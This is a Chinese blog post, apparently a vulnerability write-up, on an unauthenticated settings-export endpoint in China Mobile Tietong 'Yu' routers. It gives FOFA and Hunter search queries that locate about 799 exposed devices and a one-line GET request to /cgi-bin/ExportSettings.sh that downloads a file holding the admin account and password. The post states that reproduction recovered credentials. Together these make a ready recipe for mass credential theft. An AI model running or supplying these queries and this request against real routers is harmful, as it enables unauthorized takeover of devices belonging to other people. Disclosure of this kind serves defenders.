中移铁通禹路由 ExportSettings 敏感信息泄露漏洞

漏洞描述:

该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证,导致攻击者能够未授权获取到路由器设置信息,包含了后台管理员用户的账号和密码

fofa: title="互联世界 物联未来-登录"

鹰图: web.body="互联世界 物联未来-登录"

POC: GET /cgi-bin/ExportSettings.sh

漏洞复现:

fofa搜索,共有799条资产

image-20240513161645969

访问资产IP,在URL后拼接/cgi-bin/ExportSettings.sh,可以下载信息文件

image-20240513161759081

使用记事本查看,获取到了管理员登录账号和密码

image-20240513161934968

posted @   LeouMaster  阅读(91)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示